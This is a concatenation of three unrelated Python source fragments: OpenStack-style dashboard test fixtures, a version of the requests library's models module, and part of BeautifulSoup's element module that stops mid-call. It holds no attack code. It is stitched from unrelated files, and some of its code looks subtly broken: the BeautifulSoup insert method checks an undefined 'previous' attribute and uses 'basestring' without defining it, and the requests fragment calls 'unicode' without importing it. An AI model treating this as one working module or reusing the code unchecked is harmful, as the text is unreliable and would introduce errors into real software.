        "hypervisor_statistics": {
            "count": 5,
            "vcpus_used": 3,
            "local_gb_used": 15,
            "memory_mb": 483310,
            "current_workload": 0,
            "vcpus": 160,
            "running_vms": 3,
            "free_disk_gb": 12548,
            "disk_available_least": 12556,
            "local_gb": 12563,
            "free_ram_mb": 428014,
            "memory_mb_used": 55296,
        }
    }

    # Services
    service_1 = services.Service(services.ServiceManager(None), {
        "status": "enabled",
        "binary": "nova-conductor",
        "zone": "internal",
        "state": "up",
        "updated_at": "2013-07-08T05:21:00.000000",
        "host": "devstack001",
        "disabled_reason": None,
    })

    service_2 = services.Service(services.ServiceManager(None), {
        "status": "enabled",
        "binary": "nova-compute",
        "zone": "nova",
        "state": "up",
        "updated_at": "2013-07-08T05:20:51.000000",
        "host": "devstack001",
        "disabled_reason": None,
    })

    service_3 = services.Service(services.ServiceManager(None), {
        "status": "enabled",
        "binary": "nova-compute",
        "zone": "nova",
        "state": "down",
        "updated_at": "2013-07-08T04:20:51.000000",
        "host": "devstack002",
        "disabled_reason": None,
    })

    service_4 = services.Service(services.ServiceManager(None), {
        "status": "disabled",
        "binary": "nova-compute",
        "zone": "nova",
        "state": "up",
        "updated_at": "2013-07-08T04:20:51.000000",
        "host": "devstack003",
        "disabled_reason": None,
    })

    TEST.services.add(service_1)
    TEST.services.add(service_2)
    TEST.services.add(service_3)
    TEST.services.add(service_4)

    # Aggregates
    aggregate_1 = aggregates.Aggregate(aggregates.AggregateManager(None), {
        "name": "foo",
        "availability_zone": "testing",
        "deleted": 0,
        "created_at": "2013-07-04T13:34:38.000000",
        "updated_at": None,
        "hosts": ["foo", "bar"],
        "deleted_at": None,
        "id": 1,
        "metadata": {"foo": "testing", "bar": "testing"},
    })

    aggregate_2 = aggregates.Aggregate(aggregates.AggregateManager(None), {
        "name": "bar",
        "availability_zone": "testing",
        "deleted": 0,
        "created_at": "2013-07-04T13:34:38.000000",
        "updated_at": None,
        "hosts": ["foo", "bar"],
        "deleted_at": None,
        "id": 2,
        "metadata": {"foo": "testing", "bar": "testing"},
    })

    TEST.aggregates.add(aggregate_1)
    TEST.aggregates.add(aggregate_2)

    # Hosts
    host1 = hosts.Host(hosts.HostManager(None), {
        "host_name": "devstack001",
        "service": "compute",
        "zone": "testing",
    })

    host2 = hosts.Host(hosts.HostManager(None), {
        "host_name": "devstack002",
        "service": "nova-conductor",
        "zone": "testing",
    })

    host3 = hosts.Host(hosts.HostManager(None), {
        "host_name": "devstack003",
        "service": "compute",
        "zone": "testing",
    })

    host4 = hosts.Host(hosts.HostManager(None), {
        "host_name": "devstack004",
        "service": "compute",
        "zone": "testing",
    })

    TEST.hosts.add(host1)
    TEST.hosts.add(host2)
    TEST.hosts.add(host3)
    TEST.hosts.add(host4)

    # Server groups
    server_group_1 = server_groups.ServerGroup(
        server_groups.ServerGroupsManager(None),
        {
            "id": "1",
            "name": "server_group_1",
            "policies": [],
        },
    )

    server_group_2 = server_groups.ServerGroup(
        server_groups.ServerGroupsManager(None),
        {
            "id": "2",
            "name": "server_group_2",
            "policies": ["affinity", "some_other_policy"],
        },
    )

    server_group_3 = server_groups.ServerGroup(
        server_groups.ServerGroupsManager(None),
        {
            "id": "3",
            "name": "server_group_3",
            "policies": ["anti-affinity", "some_other_policy"],
        },
    )

    TEST.server_groups.add(server_group_1)
    TEST.server_groups.add(server_group_2)
    TEST.server_groups.add(server_group_3)
| |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import collections
import datetime
from io import BytesIO, UnsupportedOperation
from .hooks import default_hooks
from .structures import CaseInsensitiveDict
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
from .packages.urllib3.fields import RequestField
from .packages.urllib3.filepost import encode_multipart_formdata
from .packages.urllib3.util import parse_url
from .packages.urllib3.exceptions import (
DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
from .exceptions import (
HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
ContentDecodingError, ConnectionError, StreamConsumedError)
from .utils import (
guess_filename, get_auth_from_url, requote_uri,
stream_decode_response_unicode, to_key_val_list, parse_header_links,
iter_slices, guess_json_utf, super_len, to_native_string)
from .compat import (
cookielib, urlunparse, urlsplit, urlencode, str, bytes, StringIO,
is_py2, chardet, json, builtin_str, basestring)
from .status_codes import codes
#: The set of HTTP status codes that indicate an automatically
#: processable redirect.
REDIRECT_STATI = (
    codes.moved,  # 301
    codes.found,  # 302
    codes.other,  # 303
    codes.temporary_redirect,  # 307
    codes.permanent_redirect,  # 308
)

#: Maximum number of redirects followed before giving up.
DEFAULT_REDIRECT_LIMIT = 30
#: Default chunk size (bytes) for iter_content.
CONTENT_CHUNK_SIZE = 10 * 1024
#: Default chunk size (bytes) for iter_lines.
ITER_CHUNK_SIZE = 512

# Alias kept because `json` is shadowed by keyword arguments below.
json_dumps = json.dumps
class RequestEncodingMixin(object):
    """URL/body encoding helpers shared by request objects."""

    @property
    def path_url(self):
        """Build the path URL to use."""

        url = []

        p = urlsplit(self.url)

        # An empty path still needs a leading slash on the request line.
        path = p.path
        if not path:
            path = '/'

        url.append(path)

        query = p.query
        if query:
            url.append('?')
            url.append(query)

        return ''.join(url)

    @staticmethod
    def _encode_params(data):
        """Encode parameters in a piece of data.

        Will successfully encode parameters when passed as a dict or a list of
        2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
        if parameters are supplied as a dict.
        """

        if isinstance(data, (str, bytes)):
            # Already-encoded payloads pass through untouched.
            return data
        elif hasattr(data, 'read'):
            # File-like objects are streamed, not encoded here.
            return data
        elif hasattr(data, '__iter__'):
            result = []
            for k, vs in to_key_val_list(data):
                if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
                    # Wrap scalars so single values and sequences share
                    # one code path below.
                    vs = [vs]
                for v in vs:
                    if v is not None:
                        result.append(
                            (k.encode('utf-8') if isinstance(k, str) else k,
                             v.encode('utf-8') if isinstance(v, str) else v))
            return urlencode(result, doseq=True)
        else:
            return data

    @staticmethod
    def _encode_files(files, data):
        """Build the body for a multipart/form-data request.

        Will successfully encode files when passed as a dict or a list of
        2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
        if parameters are supplied as a dict.

        :raises ValueError: if *files* is empty or *data* is a string.
        """
        if (not files):
            raise ValueError("Files must be provided.")
        elif isinstance(data, basestring):
            raise ValueError("Data must not be a string.")

        new_fields = []
        fields = to_key_val_list(data or {})
        files = to_key_val_list(files or {})

        for field, val in fields:
            if isinstance(val, basestring) or not hasattr(val, '__iter__'):
                val = [val]
            for v in val:
                if v is not None:
                    # Don't call str() on bytestrings: in Py3 it all goes wrong.
                    if not isinstance(v, bytes):
                        v = str(v)

                    new_fields.append(
                        (field.decode('utf-8') if isinstance(field, bytes) else field,
                         v.encode('utf-8') if isinstance(v, str) else v))

        for (k, v) in files:
            # support for explicit filename
            # Accepted tuple forms: (filename, fileobj),
            # (filename, fileobj, content_type),
            # (filename, fileobj, content_type, custom_headers).
            ft = None
            fh = None
            if isinstance(v, (tuple, list)):
                if len(v) == 2:
                    fn, fp = v
                elif len(v) == 3:
                    fn, fp, ft = v
                else:
                    fn, fp, ft, fh = v
            else:
                fn = guess_filename(v) or k
                fp = v
            if isinstance(fp, (str, bytes, bytearray)):
                fdata = fp
            else:
                fdata = fp.read()

            rf = RequestField(name=k, data=fdata,
                              filename=fn, headers=fh)
            rf.make_multipart(content_type=ft)
            new_fields.append(rf)

        body, content_type = encode_multipart_formdata(new_fields)

        return body, content_type
class RequestHooksMixin(object):
    """Hook registration/deregistration shared by Request and PreparedRequest."""

    def register_hook(self, event, hook):
        """Properly register a hook.

        *hook* may be a single callable or an iterable of callables;
        non-callable items in an iterable are silently skipped.

        :raises ValueError: if *event* is not a known hook event.
        """
        if event not in self.hooks:
            raise ValueError('Unsupported event specified, with event name "%s"' % (event))

        # Use the callable() builtin instead of isinstance(hook,
        # collections.Callable): the Callable ABC lives in collections.abc
        # and the collections-namespace alias was removed in Python 3.10,
        # so the old check raises AttributeError on modern interpreters.
        if callable(hook):
            self.hooks[event].append(hook)
        elif hasattr(hook, '__iter__'):
            self.hooks[event].extend(h for h in hook if callable(h))

    def deregister_hook(self, event, hook):
        """Deregister a previously registered hook.
        Returns True if the hook existed, False if not.
        """

        try:
            self.hooks[event].remove(hook)
            return True
        except ValueError:
            return False
class Request(RequestHooksMixin):
    """A user-created :class:`Request <Request>` object.

    Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server.

    :param method: HTTP method to use.
    :param url: URL to send.
    :param headers: dictionary of headers to send.
    :param files: dictionary of {filename: fileobject} files to multipart upload.
    :param data: the body to attach to the request. If a dictionary is provided, form-encoding will take place.
    :param json: json for the body to attach to the request (if data is not specified).
    :param params: dictionary of URL parameters to append to the URL.
    :param auth: Auth handler or (user, pass) tuple.
    :param cookies: dictionary or CookieJar of cookies to attach to this request.
    :param hooks: dictionary of callback hooks, for internal usage.

    Usage::

      >>> import requests
      >>> req = requests.Request('GET', 'http://httpbin.org/get')
      >>> req.prepare()
      <PreparedRequest [GET]>
    """

    def __init__(self,
            method=None,
            url=None,
            headers=None,
            files=None,
            data=None,
            params=None,
            auth=None,
            cookies=None,
            hooks=None,
            json=None):

        # Normalize omitted collection arguments to fresh empty containers;
        # mutable defaults must never live in the signature itself.
        if data is None:
            data = []
        if files is None:
            files = []
        if headers is None:
            headers = {}
        if params is None:
            params = {}
        if hooks is None:
            hooks = {}

        self.hooks = default_hooks()
        for event, callbacks in list(hooks.items()):
            self.register_hook(event=event, hook=callbacks)

        self.method = method
        self.url = url
        self.headers = headers
        self.files = files
        self.data = data
        self.json = json
        self.params = params
        self.auth = auth
        self.cookies = cookies

    def __repr__(self):
        return '<Request [%s]>' % (self.method)

    def prepare(self):
        """Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
        prepared = PreparedRequest()
        prepared.prepare(
            method=self.method,
            url=self.url,
            headers=self.headers,
            files=self.files,
            data=self.data,
            json=self.json,
            params=self.params,
            auth=self.auth,
            cookies=self.cookies,
            hooks=self.hooks,
        )
        return prepared
class PreparedRequest(RequestEncodingMixin, RequestHooksMixin):
    """The fully mutable :class:`PreparedRequest <PreparedRequest>` object,
    containing the exact bytes that will be sent to the server.

    Generated from either a :class:`Request <Request>` object or manually.

    Usage::

        >>> import requests
        >>> req = requests.Request('GET', 'http://httpbin.org/get')
        >>> r = req.prepare()
        <PreparedRequest [GET]>
        >>> s = requests.Session()
        >>> s.send(r)
        <Response [200]>
    """
    def __init__(self):
        #: HTTP verb to send to the server.
        self.method = None
        #: HTTP URL to send the request to.
        self.url = None
        #: dictionary of HTTP headers.
        self.headers = None
        # The `CookieJar` used to create the Cookie header will be stored here
        # after prepare_cookies is called
        self._cookies = None
        #: request body to send to the server.
        self.body = None
        #: dictionary of callback hooks, for internal usage.
        self.hooks = default_hooks()
    def prepare(self, method=None, url=None, headers=None, files=None,
            data=None, params=None, auth=None, cookies=None, hooks=None,
            json=None):
        """Prepares the entire request with the given parameters.

        The individual prepare_* steps run in a deliberate order: headers
        and cookies must exist before the body (body preparation writes
        Content-Length / Content-Type headers), and auth runs last so an
        authenticator sees the fully prepared request.
        """
        self.prepare_method(method)
        self.prepare_url(url, params)
        self.prepare_headers(headers)
        self.prepare_cookies(cookies)
        self.prepare_body(data, files, json)
        self.prepare_auth(auth, url)
        # Note that prepare_auth must be last to enable authentication schemes
        # such as OAuth to work on a fully prepared request.
        # This MUST go after prepare_auth. Authenticators could add a hook
        self.prepare_hooks(hooks)
    def __repr__(self):
        return '<PreparedRequest [%s]>' % (self.method)
    def copy(self):
        # Shallow-ish copy: headers and cookies are duplicated, but the
        # body and the hooks table are shared with the original.
        p = PreparedRequest()
        p.method = self.method
        p.url = self.url
        p.headers = self.headers.copy() if self.headers is not None else None
        p._cookies = _copy_cookie_jar(self._cookies)
        p.body = self.body
        p.hooks = self.hooks
        return p
    def prepare_method(self, method):
        """Prepares the given HTTP method (normalized to upper case)."""
        self.method = method
        if self.method is not None:
            self.method = self.method.upper()
    def prepare_url(self, url, params):
        """Prepares the given HTTP URL."""
        #: Accept objects that have string representations.
        #: We're unable to blindly call unicode/str functions
        #: as this will include the bytestring indicator (b'')
        #: on python 3.x.
        #: https://github.com/kennethreitz/requests/pull/2238
        if isinstance(url, bytes):
            url = url.decode('utf8')
        else:
            url = unicode(url) if is_py2 else str(url)
        # Don't do any URL preparation for non-HTTP schemes like `mailto`,
        # `data` etc to work around exceptions from `url_parse`, which
        # handles RFC 3986 only.
        if ':' in url and not url.lower().startswith('http'):
            self.url = url
            return
        # Support for unicode domain names and paths.
        try:
            scheme, auth, host, port, path, query, fragment = parse_url(url)
        except LocationParseError as e:
            raise InvalidURL(*e.args)
        if not scheme:
            raise MissingSchema("Invalid URL {0!r}: No schema supplied. "
                                "Perhaps you meant http://{0}?".format(
                                    to_native_string(url, 'utf8')))
        if not host:
            raise InvalidURL("Invalid URL %r: No host supplied" % url)
        # Only want to apply IDNA to the hostname
        try:
            host = host.encode('idna').decode('utf-8')
        except UnicodeError:
            raise InvalidURL('URL has an invalid label.')
        # Carefully reconstruct the network location
        netloc = auth or ''
        if netloc:
            netloc += '@'
        netloc += host
        if port:
            netloc += ':' + str(port)
        # Bare domains aren't valid URLs.
        if not path:
            path = '/'
        if is_py2:
            # On Python 2 every component must be bytes before urlunparse.
            if isinstance(scheme, str):
                scheme = scheme.encode('utf-8')
            if isinstance(netloc, str):
                netloc = netloc.encode('utf-8')
            if isinstance(path, str):
                path = path.encode('utf-8')
            if isinstance(query, str):
                query = query.encode('utf-8')
            if isinstance(fragment, str):
                fragment = fragment.encode('utf-8')
        # Merge explicit params into any query string already in the URL.
        enc_params = self._encode_params(params)
        if enc_params:
            if query:
                query = '%s&%s' % (query, enc_params)
            else:
                query = enc_params
        url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))
        self.url = url
    def prepare_headers(self, headers):
        """Prepares the given HTTP headers into a CaseInsensitiveDict."""
        if headers:
            self.headers = CaseInsensitiveDict((to_native_string(name), value) for name, value in headers.items())
        else:
            self.headers = CaseInsensitiveDict()
    def prepare_body(self, data, files, json=None):
        """Prepares the given HTTP body data."""
        # Check if file, fo, generator, iterator.
        # If not, run through normal process.
        # Nottin' on you.
        body = None
        content_type = None
        length = None
        if json is not None:
            # JSON body; may still be overridden below if `data` is given.
            content_type = 'application/json'
            body = json_dumps(json)
        # A "stream" is any iterable that is not a plain container/string.
        is_stream = all([
            hasattr(data, '__iter__'),
            not isinstance(data, (basestring, list, tuple, dict))
        ])
        try:
            length = super_len(data)
        except (TypeError, AttributeError, UnsupportedOperation):
            length = None
        if is_stream:
            body = data
            if files:
                raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
            if length is not None:
                self.headers['Content-Length'] = builtin_str(length)
            else:
                # Unknown length: fall back to chunked transfer encoding.
                self.headers['Transfer-Encoding'] = 'chunked'
        else:
            # Multi-part file uploads.
            if files:
                (body, content_type) = self._encode_files(files, data)
            else:
                if data and json is None:
                    body = self._encode_params(data)
                    if isinstance(data, basestring) or hasattr(data, 'read'):
                        content_type = None
                    else:
                        content_type = 'application/x-www-form-urlencoded'
            self.prepare_content_length(body)
            # Add content-type if it wasn't explicitly provided.
            if content_type and ('content-type' not in self.headers):
                self.headers['Content-Type'] = content_type
        self.body = body
    def prepare_content_length(self, body):
        # Sets the Content-Length header from the body, seeking file-like
        # bodies to measure them; GET/HEAD with no body get no header.
        if hasattr(body, 'seek') and hasattr(body, 'tell'):
            body.seek(0, 2)
            self.headers['Content-Length'] = builtin_str(body.tell())
            body.seek(0, 0)
        elif body is not None:
            l = super_len(body)
            if l:
                self.headers['Content-Length'] = builtin_str(l)
        elif (self.method not in ('GET', 'HEAD')) and (self.headers.get('Content-Length') is None):
            self.headers['Content-Length'] = '0'
    def prepare_auth(self, auth, url=''):
        """Prepares the given HTTP auth data."""
        # If no Auth is explicitly provided, extract it from the URL first.
        if auth is None:
            url_auth = get_auth_from_url(self.url)
            auth = url_auth if any(url_auth) else None
        if auth:
            if isinstance(auth, tuple) and len(auth) == 2:
                # special-case basic HTTP auth
                auth = HTTPBasicAuth(*auth)
            # Allow auth to make its changes.
            r = auth(self)
            # Update self to reflect the auth changes.
            self.__dict__.update(r.__dict__)
            # Recompute Content-Length
            self.prepare_content_length(self.body)
    def prepare_cookies(self, cookies):
        """Prepares the given HTTP cookie data.
        This function eventually generates a ``Cookie`` header from the
        given cookies using cookielib. Due to cookielib's design, the header
        will not be regenerated if it already exists, meaning this function
        can only be called once for the life of the
        :class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls
        to ``prepare_cookies`` will have no actual effect, unless the "Cookie"
        header is removed beforehand."""
        if isinstance(cookies, cookielib.CookieJar):
            self._cookies = cookies
        else:
            self._cookies = cookiejar_from_dict(cookies)
        cookie_header = get_cookie_header(self._cookies, self)
        if cookie_header is not None:
            self.headers['Cookie'] = cookie_header
    def prepare_hooks(self, hooks):
        """Prepares the given hooks."""
        # hooks can be passed as None to the prepare method and to this
        # method. To prevent iterating over None, simply use an empty list
        # if hooks is False-y
        hooks = hooks or []
        for event in hooks:
            self.register_hook(event, hooks[event])
class Response(object):
    """The :class:`Response <Response>` object, which contains a
    server's response to an HTTP request.
    """
    # Attributes preserved across pickling (see __getstate__/__setstate__).
    __attrs__ = [
        '_content',
        'status_code',
        'headers',
        'url',
        'history',
        'encoding',
        'reason',
        'cookies',
        'elapsed',
        'request',
    ]
    def __init__(self):
        super(Response, self).__init__()
        # _content is False until the body has been read; afterwards it is
        # the bytes payload (or None if reading failed / status was 0).
        self._content = False
        self._content_consumed = False
        #: Integer Code of responded HTTP Status, e.g. 404 or 200.
        self.status_code = None
        #: Case-insensitive Dictionary of Response Headers.
        #: For example, ``headers['content-encoding']`` will return the
        #: value of a ``'Content-Encoding'`` response header.
        self.headers = CaseInsensitiveDict()
        #: File-like object representation of response (for advanced usage).
        #: Use of ``raw`` requires that ``stream=True`` be set on the request.
        # This requirement does not apply for use internally to Requests.
        self.raw = None
        #: Final URL location of Response.
        self.url = None
        #: Encoding to decode with when accessing r.text.
        self.encoding = None
        #: A list of :class:`Response <Response>` objects from
        #: the history of the Request. Any redirect responses will end
        #: up here. The list is sorted from the oldest to the most recent request.
        self.history = []
        #: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK".
        self.reason = None
        #: A CookieJar of Cookies the server sent back.
        self.cookies = cookiejar_from_dict({})
        #: The amount of time elapsed between sending the request
        #: and the arrival of the response (as a timedelta).
        #: This property specifically measures the time taken between sending
        #: the first byte of the request and finishing parsing the headers. It
        #: is therefore unaffected by consuming the response content or the
        #: value of the ``stream`` keyword argument.
        self.elapsed = datetime.timedelta(0)
        #: The :class:`PreparedRequest <PreparedRequest>` object to which this
        #: is a response.
        self.request = None
    def __getstate__(self):
        # Consume everything; accessing the content attribute makes
        # sure the content has been fully read.
        if not self._content_consumed:
            self.content
        return dict(
            (attr, getattr(self, attr, None))
            for attr in self.__attrs__
        )
    def __setstate__(self, state):
        for name, value in state.items():
            setattr(self, name, value)
        # pickled objects do not have .raw
        setattr(self, '_content_consumed', True)
        setattr(self, 'raw', None)
    def __repr__(self):
        return '<Response [%s]>' % (self.status_code)
    def __bool__(self):
        """Returns true if :attr:`status_code` is 'OK'."""
        return self.ok
    def __nonzero__(self):
        """Returns true if :attr:`status_code` is 'OK'."""
        return self.ok
    def __iter__(self):
        """Allows you to use a response as an iterator."""
        return self.iter_content(128)
    @property
    def ok(self):
        # True unless raise_for_status() would raise (i.e. status < 400).
        try:
            self.raise_for_status()
        except HTTPError:
            return False
        return True
    @property
    def is_redirect(self):
        """True if this Response is a well-formed HTTP redirect that could have
        been processed automatically (by :meth:`Session.resolve_redirects`).
        """
        return ('location' in self.headers and self.status_code in REDIRECT_STATI)
    @property
    def is_permanent_redirect(self):
        """True if this Response one of the permanent versions of redirect"""
        return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
    @property
    def apparent_encoding(self):
        """The apparent encoding, provided by the chardet library"""
        return chardet.detect(self.content)['encoding']
    def iter_content(self, chunk_size=1, decode_unicode=False):
        """Iterates over the response data. When stream=True is set on the
        request, this avoids reading the content at once into memory for
        large responses. The chunk size is the number of bytes it should
        read into memory. This is not necessarily the length of each item
        returned as decoding can take place.
        If decode_unicode is True, content will be decoded using the best
        available encoding based on the response.
        """
        def generate():
            try:
                # Special case for urllib3.
                try:
                    for chunk in self.raw.stream(chunk_size, decode_content=True):
                        yield chunk
                except ProtocolError as e:
                    raise ChunkedEncodingError(e)
                except DecodeError as e:
                    raise ContentDecodingError(e)
                except ReadTimeoutError as e:
                    raise ConnectionError(e)
            except AttributeError:
                # Standard file-like object.
                while True:
                    chunk = self.raw.read(chunk_size)
                    if not chunk:
                        break
                    yield chunk
            self._content_consumed = True
        # _content is a bool only while unread; consumed + unread is an error.
        if self._content_consumed and isinstance(self._content, bool):
            raise StreamConsumedError()
        # simulate reading small chunks of the content
        reused_chunks = iter_slices(self._content, chunk_size)
        stream_chunks = generate()
        chunks = reused_chunks if self._content_consumed else stream_chunks
        if decode_unicode:
            chunks = stream_decode_response_unicode(chunks, self)
        return chunks
    def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=None, delimiter=None):
        """Iterates over the response data, one line at a time. When
        stream=True is set on the request, this avoids reading the
        content at once into memory for large responses.
        .. note:: This method is not reentrant safe.
        """
        pending = None
        for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
            if pending is not None:
                chunk = pending + chunk
            if delimiter:
                lines = chunk.split(delimiter)
            else:
                lines = chunk.splitlines()
            # If the chunk does not end on a line boundary, hold the last
            # partial line back until the next chunk arrives.
            if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
                pending = lines.pop()
            else:
                pending = None
            for line in lines:
                yield line
        if pending is not None:
            yield pending
    @property
    def content(self):
        """Content of the response, in bytes."""
        if self._content is False:
            # Read the contents.
            try:
                if self._content_consumed:
                    raise RuntimeError(
                        'The content for this response was already consumed')
                if self.status_code == 0:
                    self._content = None
                else:
                    self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
            except AttributeError:
                self._content = None
        self._content_consumed = True
        # don't need to release the connection; that's been handled by urllib3
        # since we exhausted the data.
        return self._content
    @property
    def text(self):
        """Content of the response, in unicode.
        If Response.encoding is None, encoding will be guessed using
        ``chardet``.
        The encoding of the response content is determined based solely on HTTP
        headers, following RFC 2616 to the letter. If you can take advantage of
        non-HTTP knowledge to make a better guess at the encoding, you should
        set ``r.encoding`` appropriately before accessing this property.
        """
        # Try charset from content-type
        content = None
        encoding = self.encoding
        if not self.content:
            return str('')
        # Fallback to auto-detected encoding.
        if self.encoding is None:
            encoding = self.apparent_encoding
        # Decode unicode from given encoding.
        try:
            content = str(self.content, encoding, errors='replace')
        except (LookupError, TypeError):
            # A LookupError is raised if the encoding was not found which could
            # indicate a misspelling or similar mistake.
            #
            # A TypeError can be raised if encoding is None
            #
            # So we try blindly encoding.
            content = str(self.content, errors='replace')
        return content
    def json(self, **kwargs):
        """Returns the json-encoded content of a response, if any.
        :param \*\*kwargs: Optional arguments that ``json.loads`` takes.
        """
        if not self.encoding and len(self.content) > 3:
            # No encoding set. JSON RFC 4627 section 3 states we should expect
            # UTF-8, -16 or -32. Detect which one to use; If the detection or
            # decoding fails, fall back to `self.text` (using chardet to make
            # a best guess).
            encoding = guess_json_utf(self.content)
            if encoding is not None:
                try:
                    return json.loads(self.content.decode(encoding), **kwargs)
                except UnicodeDecodeError:
                    # Wrong UTF codec detected; usually because it's not UTF-8
                    # but some other 8-bit codec. This is an RFC violation,
                    # and the server didn't bother to tell us what codec *was*
                    # used.
                    pass
        return json.loads(self.text, **kwargs)
    @property
    def links(self):
        """Returns the parsed header links of the response, if any."""
        header = self.headers.get('link')
        # l = MultiDict()
        l = {}
        if header:
            links = parse_header_links(header)
            for link in links:
                # Prefer the 'rel' value as the key; fall back to the URL.
                key = link.get('rel') or link.get('url')
                l[key] = link
        return l
    def raise_for_status(self):
        """Raises stored :class:`HTTPError`, if one occurred."""
        http_error_msg = ''
        if 400 <= self.status_code < 500:
            http_error_msg = '%s Client Error: %s' % (self.status_code, self.reason)
        elif 500 <= self.status_code < 600:
            http_error_msg = '%s Server Error: %s' % (self.status_code, self.reason)
        if http_error_msg:
            raise HTTPError(http_error_msg, response=self)
    def close(self):
        """Releases the connection back to the pool. Once this method has been
        called the underlying ``raw`` object must not be accessed again.
        *Note: Should not normally need to be called explicitly.*
        """
        return self.raw.release_conn()
| |
import collections
import re
import sys
import warnings
from bs4.dammit import EntitySubstitution
# Encoding used when a NavigableString must be built from raw bytes.
DEFAULT_OUTPUT_ENCODING = "utf-8"
# True when running under Python 3.
PY3K = (sys.version_info[0] > 2)
def _match_css_class(str):
    """Build a RE to match the given CSS class.

    The class name must appear either at the start of the string or
    immediately after whitespace, and be followed by whitespace or the
    end of the string.
    """
    return re.compile(r"(^|.*\s)" + str + r"($|\s)")
def _alias(attr):
    """Alias one attribute name to another for backward compatibility"""
    @property
    def alias(self):
        return getattr(self, attr)
    @alias.setter
    def alias(self, value):
        # Bug fix: the setter previously took no value argument and called
        # setattr(self, attr) with only two arguments, so any assignment
        # through the alias raised a TypeError.
        return setattr(self, attr, value)
    return alias
class PageElement(object):
    """Contains the navigational information for some part of the page
    (either a tag or a piece of text)

    Maintains four doubly-linked relationships: parent/contents,
    previous_sibling/next_sibling (tree order within a parent) and
    previous_element/next_element (document parse order).
    """
    def setup(self, parent=None, previous_element=None):
        """Sets up the initial relations between this element and
        other elements."""
        self.parent = parent
        self.previous_element = previous_element
        self.next_element = None
        self.previous_sibling = None
        self.next_sibling = None
        # If the parent already has children, this element becomes the
        # new last sibling.
        if self.parent and self.parent.contents:
            self.previous_sibling = self.parent.contents[-1]
            self.previous_sibling.next_sibling = self
    nextSibling = _alias("next_sibling")  # BS3
    previousSibling = _alias("previous_sibling")  # BS3
    def replace_with(self, replace_with):
        # Swap this element for another one at the same tree position.
        if replace_with is self:
            return
        old_parent = self.parent
        my_index = self.parent.index(self)
        if (hasattr(replace_with, 'parent')
            and replace_with.parent is self.parent):
            # We're replacing this element with one of its siblings.
            if self.parent.index(replace_with) < my_index:
                # Furthermore, it comes before this element. That
                # means that when we extract it, the index of this
                # element will change.
                my_index -= 1
        self.extract()
        old_parent.insert(my_index, replace_with)
    replaceWith = replace_with  # BS3
    def replace_with_children(self):
        # Replace this element with its own children, in place.
        my_parent = self.parent
        my_index = self.parent.index(self)
        self.extract()
        for child in reversed(self.contents[:]):
            my_parent.insert(my_index, child)
    replaceWithChildren = replace_with_children  # BS3
    def extract(self):
        """Destructively rips this element out of the tree."""
        if self.parent:
            del self.parent.contents[self.parent.index(self)]
        #Find the two elements that would be next to each other if
        #this element (and any children) hadn't been parsed. Connect
        #the two.
        last_child = self._last_descendant()
        next_element = last_child.next_element
        if self.previous_element:
            self.previous_element.next_element = next_element
        if next_element:
            next_element.previous_element = self.previous_element
        self.previous_element = None
        last_child.next_element = None
        self.parent = None
        if self.previous_sibling:
            self.previous_sibling.next_sibling = self.next_sibling
        if self.next_sibling:
            self.next_sibling.previous_sibling = self.previous_sibling
        self.previous_sibling = self.next_sibling = None
        return self
    def _last_descendant(self):
        "Finds the last element beneath this object to be parsed."
        last_child = self
        while hasattr(last_child, 'contents') and last_child.contents:
            last_child = last_child.contents[-1]
        return last_child
    # BS3: Not part of the API!
    _lastRecursiveChild = _last_descendant
    def insert(self, position, new_child):
        # Insert new_child into self.contents at the given position,
        # rewiring all sibling and element pointers around it.
        if (isinstance(new_child, basestring)
            and not isinstance(new_child, NavigableString)):
            new_child = NavigableString(new_child)
        position = min(position, len(self.contents))
        if hasattr(new_child, 'parent') and new_child.parent is not None:
            # We're 'inserting' an element that's already one
            # of this object's children.
            if new_child.parent is self:
                if self.index(new_child) > position:
                    # Furthermore we're moving it further down the
                    # list of this object's children. That means that
                    # when we extract this element, our target index
                    # will jump down one.
                    position -= 1
            new_child.extract()
        new_child.parent = self
        previous_child = None
        if position == 0:
            new_child.previous_sibling = None
            new_child.previous_element = self
        else:
            previous_child = self.contents[position - 1]
            new_child.previous_sibling = previous_child
            new_child.previous_sibling.next_sibling = new_child
            new_child.previous_element = previous_child._last_descendant()
        if new_child.previous:
            new_child.previous_element.next_element = new_child
        new_childs_last_element = new_child._last_descendant()
        if position >= len(self.contents):
            # Appending at the end: the next element in parse order is
            # found by walking up to the first ancestor with a next sibling.
            new_child.next_sibling = None
            parent = self
            parents_next_sibling = None
            while not parents_next_sibling:
                parents_next_sibling = parent.next_sibling
                parent = parent.parent
                if not parent:  # This is the last element in the document.
                    break
            if parents_next_sibling:
                new_childs_last_element.next_element = parents_next_sibling
            else:
                new_childs_last_element.next_element = None
        else:
            next_child = self.contents[position]
            new_child.next_sibling = next_child
            if new_child.next_sibling:
                new_child.next_sibling.previous_sibling = new_child
            new_childs_last_element.next_element = next_child
        if new_childs_last_element.next_element:
            new_childs_last_element.next_element.previous_element = new_childs_last_element
        self.contents.insert(position, new_child)
    def append(self, tag):
        """Appends the given tag to the contents of this tag."""
        self.insert(len(self.contents), tag)
    def find_next(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the first item that matches the given criteria and
        appears after this Tag in the document."""
        return self._find_one(self.find_all_next, name, attrs, text, **kwargs)
    findNext = find_next  # BS3
    def find_all_next(self, name=None, attrs={}, text=None, limit=None,
                    **kwargs):
        """Returns all items that match the given criteria and appear
        after this Tag in the document."""
        return self._find_all(name, attrs, text, limit, self.next_elements,
